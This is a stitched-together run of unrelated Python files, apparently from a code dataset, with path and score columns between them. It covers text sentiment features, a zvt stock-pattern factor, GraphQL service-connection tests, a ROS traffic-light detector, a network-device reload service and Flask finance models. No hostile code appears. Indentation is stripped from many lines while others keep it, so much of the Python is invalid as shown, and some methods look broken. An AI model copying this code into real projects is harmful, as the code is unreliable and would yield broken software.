if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['posSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[0] )
return self
def getNSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['negSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[1] )
return self
def getObjSentiSum(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
self.df['objSentiSum'] = self.df["posNegObjSentiSum"].apply(lambda ind:ind[2] )
return self
def getPSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['posSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[0] )
return self
def getNSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['negSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[1] )
return self
def getObjSentiMean(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiMean' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['objSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[2] )
return self
def getPNSentiGap(self):
if not 'tags' in self.df.columns:
self.getTags()
        if not 'posNegObjSenti' in self.df.columns or not 'posNegObjSentiSum' in self.df.columns:
            self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
            self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
        if not 'posSentiSum' in self.df.columns:
            self.getPSentiSum()
        if not 'negSentiSum' in self.df.columns:
            self.getNSentiSum()
self.df['posNegGap'] = self.df["posSentiSum"] + self.df["negSentiSum"]
return self
def getSentiment(self):
return self.getPSentiSum().getNSentiSum().getObjSentiSum().getPSentiMean().getNSentiMean().getObjSentiMean().getPNSentiGap()
## Synsets
def getSynsets(self):
self.df[["synsetMean","synsetMax","synsetGap"]] = pd.DataFrame(self.df["textSeq"].apply(getSynsetsMeanMaxGap).tolist(),index = self.df.index)
return self
def getAllFeatures(self):
return self.getStructure().getFreq().getWrittenSpoken().getSyno().getSynsets().getSentiment().df | 0.458591 | 0.171616 |
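# Illustrative usage sketch for the fluent feature-extraction API above.
# Assumptions: the wrapping class name `TextFeatureExtractor` and its constructor
# are hypothetical (the class header sits earlier in the source file), and the
# DataFrame must already carry a raw 'text' column plus a tokenized 'textSeq'
# column. Each getX() method returns `self`, so the calls compose and
# getAllFeatures() hands back the enriched DataFrame.
#
# import pandas as pd
# df = pd.DataFrame({'text': ["I love this movie!!!", "that was terrible :("]})
# df['textSeq'] = df['text'].str.split()
# features = TextFeatureExtractor(df).getAllFeatures()
# print(features[['meanWordLength', 'EmojisScore', 'laughingExpr']].head())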
import argparse
from typing import List, Union
import pandas as pd
from zvt.contract import IntervalLevel
from zvt.utils.pd_utils import pd_is_not_null
from zvt.utils.time_utils import now_pd_timestamp
from zvt.api import get_entities, Stock
from zvt.api.quote import get_zen_factor_schema
from zvt.factors.factor import Accumulator, Transformer
from zvt.factors.technical_factor import TechnicalFactor
def is_including(s1: pd.Series, s2: pd.Series):
if (s1['high'] >= s2['high']) and (s1['low'] <= s2['low']):
return True
if (s1['high'] <= s2['high']) and (s1['low'] >= s2['low']):
return True
return False
def get_current_state(s1: pd.Series, s2: pd.Series, pre_state=0):
    # rising: higher high and higher low
    if (s1['high'] > s2['high']) and (s1['low'] > s2['low']):
        return 1
    # falling: lower high and lower low
    if (s1['high'] < s2['high']) and (s1['low'] < s2['low']):
        return -1
    # sideways (inclusion relation): keep the previous state
return pre_state
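# Illustrative sketch of how get_current_state() classifies two consecutive bars;
# the sample highs/lows below are made up and the helper name is hypothetical.
def _demo_bar_state():
    up = get_current_state(pd.Series({'high': 11, 'low': 9}),
                           pd.Series({'high': 10, 'low': 8}))        # -> 1 (rising)
    down = get_current_state(pd.Series({'high': 9, 'low': 7}),
                             pd.Series({'high': 10, 'low': 8}))      # -> -1 (falling)
    # inclusion: the first bar contains the second, so the previous state is kept
    kept = get_current_state(pd.Series({'high': 12, 'low': 7}),
                             pd.Series({'high': 10, 'low': 8}), pre_state=1)  # -> 1
    return up, down, kept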
class ZenAccumulator(Accumulator):
def acc(self, input_df, acc_df) -> pd.DataFrame:
if pd_is_not_null(acc_df):
input_df = input_df[~input_df['id'].isin(acc_df['id'])]
input_df = input_df.copy()
for entity_id, df in input_df.groupby(level=0):
pre_index = None
pre_item = None
current_state = 0
pre_state = 0
for index, item in df.iterrows():
if pre_item is not None:
current_state = get_current_state(item, pre_item, current_state)
input_df.loc[index, 'tmp_bi_state'] = current_state
if (current_state != 0 and pre_state != 0) and current_state != pre_state:
# -1 -> 1
if current_state == 1:
input_df.loc[pre_index, 'tmp_di'] = True
# 1 -> -1
if current_state == -1:
input_df.loc[pre_index, 'tmp_ding'] = True
pre_index = index
pre_item = item
pre_state = current_state
            self.logger.debug(input_df)
self.logger.info('finish calculating :{}'.format(entity_id))
if pd_is_not_null(acc_df):
if pd_is_not_null(input_df):
                df = input_df[list(set(acc_df.columns) & set(input_df.columns))]
acc_df = acc_df.append(df)
acc_df = acc_df.sort_index(level=[0, 1])
else:
acc_df = input_df
return acc_df
class ZenFactor(TechnicalFactor):
def __init__(self, entity_ids: List[str] = None, entity_type: str = 'stock', exchanges: List[str] = ['sh', 'sz'],
codes: List[str] = None, the_timestamp: Union[str, pd.Timestamp] = None,
start_timestamp: Union[str, pd.Timestamp] = None, end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = None, filters: List = None, order: object = None, limit: int = None,
provider: str = 'joinquant', level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = 'entity_id', time_field: str = 'timestamp', computing_window: int = None,
keep_all_timestamp: bool = False, fill_method: str = 'ffill', effective_number: int = 10,
need_persist: bool = False, dry_run: bool = True) -> None:
self.factor_schema = get_zen_factor_schema(entity_type=entity_type, level=level)
transformer: Transformer = None
acc = ZenAccumulator()
super().__init__(entity_ids, entity_type, exchanges, codes, the_timestamp, start_timestamp,
end_timestamp, columns, filters, order, limit, provider, level, category_field, time_field,
computing_window, keep_all_timestamp, fill_method, effective_number, transformer, acc,
need_persist, dry_run)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--level', help='trading level', default='1d',
choices=[item.value for item in IntervalLevel])
parser.add_argument('--start', help='start code', default='000001')
parser.add_argument('--end', help='end code', default='000005')
args = parser.parse_args()
level = IntervalLevel(args.level)
start = args.start
end = args.end
entities = get_entities(provider='eastmoney', entity_type='stock', columns=[Stock.entity_id, Stock.code],
filters=[Stock.code >= start, Stock.code < end])
codes = entities.index.to_list()
factor = ZenFactor(codes=codes, start_timestamp='2005-01-01',
end_timestamp=now_pd_timestamp(),
                       level=level) | zvt/factors/zen/zen_factor.py | 0.506347 | 0.296215
import pytest
from open_city_profile.consts import (
SERVICE_CONNECTION_ALREADY_EXISTS_ERROR,
SERVICE_NOT_IDENTIFIED_ERROR,
)
from open_city_profile.tests.asserts import assert_match_error_code
from services.enums import ServiceType
from services.tests.factories import ProfileFactory, ServiceConnectionFactory
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_query_own_services(
user_gql_client, service, allowed_data_field_factory
):
profile = ProfileFactory(user=user_gql_client.user)
first_field = allowed_data_field_factory()
second_field = allowed_data_field_factory()
allowed_data_field_factory()
service.allowed_data_fields.add(first_field)
service.allowed_data_fields.add(second_field)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
title
description
allowedDataFields {
edges {
node {
fieldName
label
}
}
}
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"title": service.title,
"description": service.description,
"allowedDataFields": {
"edges": [
{
"node": {
"fieldName": first_field.field_name,
"label": first_field.label,
}
},
{
"node": {
"fieldName": second_field.field_name,
"label": second_field.label,
}
},
]
},
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_add_service(user_gql_client, service):
ProfileFactory(user=user_gql_client.user)
    # service object with type is included in query just to ensure that it has NO effect
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
service: {
type: GODCHILDREN_OF_CULTURE
}
enabled: false
}
}) {
serviceConnection {
service {
type
name
}
enabled
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name},
"enabled": False,
}
}
}
executed = user_gql_client.execute(query, service=service)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_cannot_add_service_multiple_times_mutation(
user_gql_client, service
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name}
}
}
}
executed = user_gql_client.execute(query, service=service)
assert dict(executed["data"]) == expected_data
assert "errors" not in executed
# do the mutation again
executed = user_gql_client.execute(query, service=service)
assert "errors" in executed
assert "code" in executed["errors"][0]["extensions"]
assert (
executed["errors"][0]["extensions"]["code"]
== SERVICE_CONNECTION_ALREADY_EXISTS_ERROR
)
def test_not_identifying_service_for_add_service_connection_produces_service_not_identified_error(
user_gql_client,
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
executed = user_gql_client.execute(query, service=None)
assert_match_error_code(executed, SERVICE_NOT_IDENTIFIED_ERROR)
def test_normal_user_can_query_own_services_gdpr_api_scopes(
user_gql_client, service_factory,
):
query_scope = "query_scope"
delete_scope = "delete_scope"
service = service_factory(
service_type=ServiceType.BERTH,
gdpr_query_scope=query_scope,
gdpr_delete_scope=delete_scope,
)
profile = ProfileFactory(user=user_gql_client.user)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
gdprQueryScope
gdprDeleteScope
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"gdprQueryScope": query_scope,
"gdprDeleteScope": delete_scope,
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
    assert dict(executed["data"]) == expected_data | services/tests/test_services_graphql_api.py | 0.582372 | 0.363534
import os
import rospy
import rospkg
import tensorflow as tf
import numpy as np
import cv2
from PIL import Image, ImageFont, ImageDraw
from abc import ABCMeta, abstractmethod
from styx_msgs.msg import TrafficLight
from light_classification.tl_classifier import TLClassifier
class SSDTLClassifier(TLClassifier):
__metaclass__ = ABCMeta
@staticmethod
def get_state_count_threshold(last_state):
if last_state == TrafficLight.RED:
# High threshold for accelerating
return 3
# Low threshold for stopping
return 1
@staticmethod
def _convert_box_coords(boxes, height, width):
"""
Converts bounding boxes from normalized
coordinates (0 to 1), to image coordinates
"""
box_coords = np.zeros_like(boxes)
box_coords[:, 0] = boxes[:, 0] * height
box_coords[:, 1] = boxes[:, 1] * width
box_coords[:, 2] = boxes[:, 2] * height
box_coords[:, 3] = boxes[:, 3] * width
return box_coords
@staticmethod
def _load_graph(graph_file):
"""Loads a frozen inference graph"""
graph = tf.Graph()
with graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(graph_file, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return graph
def _filter_boxes(self, boxes, scores, classes):
"""
Filters boxes with scores less than
confidence threshold
"""
n = len(classes)
idxs = []
for i in range(n):
if scores[i] >= self.confidence:
idxs.append(i)
boxes = boxes[idxs, ...]
scores = scores[idxs, ...]
classes = classes[idxs, ...]
return boxes, scores, classes
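    # A minimal alternative sketch (assumption, not the original implementation):
    # the same confidence filtering can be written with a NumPy boolean mask
    # instead of an explicit Python loop.
    def _filter_boxes_vectorized(self, boxes, scores, classes):
        """Equivalent of _filter_boxes using boolean-mask indexing."""
        keep = scores >= self.confidence
        return boxes[keep], scores[keep], classes[keep]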
def _get_debug_image(self, image, boxes, scores, classes):
"""Draws detected bounding boxes"""
if classes.size == 0:
return image
pil_image = Image.fromarray(image)
width, height = pil_image.size
box_coords = self._convert_box_coords(boxes, height, width)
font = ImageFont.truetype(font=os.path.join(self.package_root_path,'config/FiraMono-Medium.otf'),
size=np.floor(3e-2 * pil_image.size[1] + 0.5).astype('int32'))
thickness = (pil_image.size[0] + pil_image.size[1]) // 300
draw = ImageDraw.Draw(pil_image)
for i, c in enumerate(classes):
score = scores[i]
predicted_class = self.labels_dict[c]
box = box_coords[i]
label = '{} {:.2f}'.format(predicted_class, score)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(pil_image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(pil_image.size[0], np.floor(right + 0.5).astype('int32'))
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for j in range(thickness):
draw.rectangle([left + j, top + j, right - j, bottom - j], outline=self.labels_dict[c])
draw.rectangle([tuple(text_origin), tuple(text_origin + label_size)], fill=self.labels_dict[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
return np.asarray(pil_image)
def _classify(self, image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_resized = cv2.resize(image, (300, 300))
image_np = np.expand_dims(np.asarray(image_resized, dtype=np.uint8), 0)
# Actual detection
(boxes, scores, classes) = self.sess.run([self.detection_boxes, self.detection_scores,
self.detection_classes], feed_dict={self.image_tensor: image_np})
# Remove unnecessary dimensions
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes)
boxes, scores, classes = self._filter_boxes(boxes, scores, classes)
for i, c in enumerate(classes):
rospy.logdebug('class = %s, score = %s', self.labels_dict[c], str(scores[i]))
if classes.size == 0:
traffic_light = TrafficLight.UNKNOWN
else:
i = np.argmax(scores)
if classes[i] == 2:
traffic_light = TrafficLight.RED
elif classes[i] == 3:
traffic_light = TrafficLight.YELLOW
elif classes[i] == 1:
traffic_light = TrafficLight.GREEN
else:
traffic_light = TrafficLight.UNKNOWN
if self.is_debug:
# create a debug image with bounding boxes and labels
debug_image = self._get_debug_image(image, boxes, scores, classes)
return traffic_light, debug_image
return traffic_light, None
@abstractmethod
def __init__(self, is_debug, model_path, confidence):
super(SSDTLClassifier, self).__init__(self.__class__.__name__, is_debug)
# Model path
self.package_root_path = rospkg.RosPack().get_path('tl_detector')
model_path = os.path.join(self.package_root_path, model_path)
# Set confidence
self.confidence = confidence
# Labels dictionary
self.labels_dict = {1: 'Green', 2: 'Red', 3: 'Yellow', 4: 'Unknown'}
# Load frozen graph of trained model
self.detection_graph = self._load_graph(model_path)
# Get tensors
self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
# Create session
self.sess = tf.Session(graph=self.detection_graph)
@TLClassifier.register_subclass('ssd-sim')
class SSDSimTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
super(SSDSimTLClassifier, self).__init__(is_debug, 'models/ssd-sim.pb', 0.8)
@TLClassifier.register_subclass('ssd-real')
class SSDRealTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
        super(SSDRealTLClassifier, self).__init__(is_debug, 'models/ssd-real.pb', 0.5) | ros/src/tl_detector/light_classification/ssd_tl_classifier.py | 0.731059 | 0.362264
__author__ = "<NAME> <<EMAIL>>"
import re
import collections
from time import sleep
from unicon.bases.routers.services import BaseService
from unicon.core.errors import SubCommandFailure, StateMachineError
from unicon.eal.dialogs import Dialog, Statement
from unicon.plugins.generic.statements import GenericStatements, \
authentication_statement_list
from unicon.plugins.confd.patterns import ConfdPatterns
from unicon.plugins.generic import GenericUtils
from .service_statements import reload_statement_list, \
reload_continue_statement_list
utils = GenericUtils()
statements = GenericStatements()
class Reload(BaseService):
"""Service to reload the device.
Arguments:
        reload_command: reload command to be issued. Default is
            "system reboot".
        dialog: Dialog containing additional Statements for any
            extra prompts raised by the reload command that are
            not covered by the built-in statement lists.
        timeout: Timeout value in seconds. Default value is {} sec
    Returns:
        Console log output if connected via a serial console;
        if connected via SSH, returns the connect log.
        Raises SubCommandFailure on failure.
Example ::
.. code-block:: python
csp.reload()
"""
def __init__(self, connection, context, **kwargs):
super().__init__(connection, context, **kwargs)
self.start_state = 'cisco_exec'
self.end_state = 'cisco_exec'
self.service_name = 'reload'
self.timeout = connection.settings.RELOAD_TIMEOUT
self.__doc__ = self.__doc__.format(connection.settings.RELOAD_TIMEOUT)
def call_service(self,
reload_command='system reboot',
dialog=Dialog([]),
timeout=None,
*args, **kwargs):
con = self.connection
timeout = timeout or self.timeout
fmt_msg = "+++ reloading %s " \
" with reload_command '%s' " \
"and timeout %s +++"
con.log.info(fmt_msg % (self.connection.hostname,
reload_command,
timeout))
if not isinstance(dialog, Dialog):
raise SubCommandFailure(
"dialog passed must be an instance of Dialog")
if self.context.get('console'):
dialog = self.service_dialog(service_dialog=dialog)
dialog += Dialog(authentication_statement_list)
dialog += Dialog(reload_continue_statement_list)
con.spawn.sendline(reload_command)
try:
self.result = dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
except Exception as err:
raise SubCommandFailure("Reload failed %s" % err)
if self.result:
self.result = utils.remove_ansi_escape_codes(self.result.match_output)
else:
con.log.warning('Did not detect a console session, will try to reconnect...')
dialog = Dialog(reload_statement_list)
con.spawn.sendline(reload_command)
dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
con.expect('.+')
con.log.warning('Disconnecting...')
con.disconnect()
for x in range(3):
con.log.warning('Waiting for {} seconds'.format(con.settings.RELOAD_WAIT))
sleep(con.settings.RELOAD_WAIT)
con.log.warning('Trying to connect... attempt #{}'.format(x+1))
try:
output = con.connect()
self.result = output
                except Exception:
con.log.warning('Connection failed')
if con.connected:
break
if not con.connected:
            raise SubCommandFailure('Reload failed - could not reconnect') | src/unicon/plugins/confd/csp/service_implementation.py | 0.460532 | 0.063482
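# Illustrative usage sketch for the Reload service above. Assumptions: the
# connected unicon device object `csp`, the extra confirmation prompt and its
# handling are made up and not taken from the original plugin.
#
# from unicon.eal.dialogs import Dialog, Statement
#
# extra = Dialog([
#     Statement(pattern=r'Are you sure\?',
#               action=lambda spawn: spawn.sendline('yes'),
#               loop_continue=True,
#               continue_timer=False),
# ])
# output = csp.reload(reload_command='system reboot', dialog=extra, timeout=600)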
from datetime import datetime, timedelta
import pandas as pd
import flask
from sqlalchemy import extract, asc, desc, func, text
from app import db, app
today = datetime.today()
first_of_this_month = today.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
last_of_prev_month = first_of_this_month - timedelta(days=1)
first_of_prev_month = last_of_prev_month.replace(day=1)
minus_13_months = (first_of_this_month - timedelta(days=390)).replace(day=1)
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
accName = db.Column(db.String, unique=True, nullable=False)
#transactions = db.relationship('Transaction', backref=db.backref('trans', lazy=True))
def __repr__(self):
return '<Account {}>'.format(self.accName)
def create_one(newAccName):
stmt = Account(accName=newAccName)
db.session.add(stmt)
db.session.commit()
def one_acc(accountid):
return Account.query.filter_by(id = accountid).first()
'''def list_acc():
q1 = db.session.query(Transaction.acc_id, Transaction.amount.label('balance'), Transaction.traDate)\
.distinct(Transaction.acc_id)\
.outerjoin(Tag)\
.filter(Tag.isBlnc==True)\
.order_by(Transaction.acc_id, Transaction.traDate.desc())\
.subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.TO_CHAR(Transaction.uplDate,'YYYY-MM-DD')).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)'''
def list_acc():
cte = db.session.query(Transaction.acc_id\
,Transaction.amount.label('balance')\
,func.row_number().over(partition_by=Transaction.acc_id, order_by=desc(Transaction.traDate)).label("rn"))\
.outerjoin(Tag)\
.filter(Tag.isBlnc==1)\
.cte()
q1 = db.session.query(cte.c.acc_id, cte.c.balance).filter(cte.c.rn == 1).subquery()
q2 = db.session.query(Account.id, Account.accName, func.max(func.date(Transaction.uplDate)).label('upldate'))\
.outerjoin(Transaction)\
.group_by(Account.id, Account.accName)\
.subquery()
return db.session.query(q2.c.id, q2.c.accName, q2.c.upldate, q1.c.balance)\
.outerjoin(q1, q2.c.id == q1.c.acc_id)
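    # Illustrative sketch of how list_acc() is typically consumed (assumption,
    # not part of the original model): each row pairs an account with its latest
    # upload date and the balance of its most recent balance-tagged transaction.
    #
    # for acc_id, acc_name, upl_date, balance in Account.list_acc():
    #     print(acc_id, acc_name, upl_date, balance)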
class Transaction(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
traDate = db.Column(db.Date, nullable=False)
amount = db.Column(db.Float, nullable=False)
desc = db.Column(db.String, nullable=False)
card = db.Column(db.String(1), nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
uplDate = db.Column(db.DateTime, nullable=False, default=datetime.now)
confirmed = db.Column(db.Boolean, nullable=True, default=False)
def __repr__(self):
return '<Transaction {}>'.format(self.desc)
def create_one(tDate, tAmnt, tDesc, tag, acc, card, confrm):
stmt = Transaction(traDate=tDate, amount=tAmnt, desc=tDesc, card=card, tag_id=tag, acc_id=acc, confirmed=confrm)
db.session.add(stmt)
db.session.commit()
def update_trans(tid, traDate, amount, desc, tag):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.traDate = traDate
stmt.amount = amount
stmt.desc = desc
stmt.tag_id = tag
stmt.confirmed = True
db.session.commit()
def update_trans_amount(tid, amount):
stmt = Transaction.query.filter_by(id=tid).first()
stmt.amount = amount
db.session.commit()
def update_desc(account_id, desc_from, desc_to):
db.session.query(Transaction)\
.filter(Transaction.desc.like('%'+ desc_from +'%'))\
.update({Transaction.desc: func.replace(Transaction.desc, desc_from, desc_to)}
,synchronize_session=False)
db.session.commit()
def delete_trans(tid):
stmt = Transaction.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def cnt_all(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id).one_or_none()
def cnt_new(account_id):
return Transaction.query.with_entities(func.count(Transaction.id).label('cnt'))\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == False).one_or_none()
def cnt_avg_sum_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags)).one_or_none()
def list_filtered(account_id, date_from, date_to, sel_tags):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.tag_id.in_(sel_tags))\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def cnt_avg_sum_filtered_new(account_id, date_from, date_to):
return Transaction.query\
.with_entities(func.count(Transaction.amount).label('a_cnt'), func.avg(Transaction.amount).label('a_avg'), func.sum(Transaction.amount).label('a_sum'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False).one_or_none()
def list_filtered_new(account_id, date_from, date_to):
return Transaction.query.filter(Transaction.acc_id == account_id, Transaction.traDate >= date_from, Transaction.traDate <= date_to, Transaction.confirmed == False)\
.order_by(Transaction.traDate.desc(), Transaction.amount)
def list_latest_uploads_by_card(account_id, card):
return db.session.query(Transaction.card, Transaction.desc, Transaction.traDate, Transaction.amount)\
.filter(Transaction.acc_id == account_id, Transaction.card == card)\
.order_by(Transaction.traDate.desc()).limit(3).all()
def first_date(account_id):
return db.session.query(db.func.min(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def last_date(account_id):
return db.session.query(db.func.max(Transaction.traDate)).filter(Transaction.acc_id==account_id).scalar() or today
def count_months(account_id):
return db.session.query(func.TO_CHAR(Transaction.traDate,'YYYYMM'))\
.filter(Transaction.acc_id == account_id, Transaction.traDate < first_of_this_month)\
.distinct().count()
def max_year(account_id):
return Transaction.query\
.with_entities(extract('year',func.max(Transaction.traDate).label('max_year')))\
.filter(Transaction.acc_id == account_id).scalar()
def list_year(account_id):
return db.session.query(extract('year',Transaction.traDate).label('year'))\
.filter(Transaction.acc_id == account_id).distinct().order_by(desc('year'))
def chart_header(column_name, account_id):
subquery = db.session.query(Tag.tgr_id).filter(getattr(Tag, column_name)==True, Taggroup.acc_id==account_id)
return db.session.query(Taggroup.gName, Taggroup.gColor)\
.filter(Taggroup.id.in_(subquery))\
.order_by(Taggroup.gName)
def chart_data(account_id, column_name, months):
first_of_n_month = (first_of_this_month - timedelta(days=months*30)).replace(day=1)
q = db.session.query(Taggroup.gName
,func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id\
,Transaction.confirmed == True\
,Transaction.traDate >= first_of_n_month\
,Transaction.traDate < first_of_this_month\
,getattr(Tag, column_name)==True)\
.group_by(Taggroup.gName\
,func.TO_CHAR(Transaction.traDate,'YYYYMM')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth'))\
.order_by('orderByCol',Taggroup.gName)
#get unique groups
g = []
prev_val = ''
for row in q:
if row.gName != prev_val:
g.append(row.gName)
prev_val = row.gName
#create months/group with default value
m = {}
prev_val = ''
for row in q:
if row.mnth != prev_val:
m[row.mnth] = {g_:0 for g_ in g}
prev_val = row.mnth
#replace values in dict if exists in q
for row in q:
for key in m:
for mk in m[key]:
if row.mnth==key and mk==row.gName :
m[key][mk] = row.total
return m
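    # Illustrative sketch of the structure chart_data() returns (values made up):
    # a month -> {group name -> monthly total} mapping, with 0 filled in for
    # groups that had no transactions in a given month, e.g.
    #
    # {'JAN': {'Food': -250.40, 'Rent': -900.00},
    #  'FEB': {'Food': -180.10, 'Rent': 0}}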
def get_dates(what_year_):
what_year = int(what_year_)
prev_year = what_year - 1
prev_month_num = last_of_prev_month.strftime("%m")
prev_month = int(prev_month_num) - 1 if int(prev_month_num) > 1 else 12
year_num = last_of_prev_month.strftime("%Y")
which_year = year_num if int(year_num) == what_year else prev_year
which_month = prev_month_num if int(year_num) == what_year else prev_month
end_12_month = last_of_prev_month.replace(year=what_year)
start_12_month = (end_12_month - timedelta(days=360)).replace(day=1)
return what_year, prev_year, which_year, which_month, start_12_month, end_12_month
def get_stats_year(account_id, what_year, lbl1, lbl2):
return db.session.query(Tag.tgr_id.label(lbl1), func.SUM(Transaction.amount).label(lbl2))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)==what_year)\
.group_by(Tag.tgr_id).subquery()
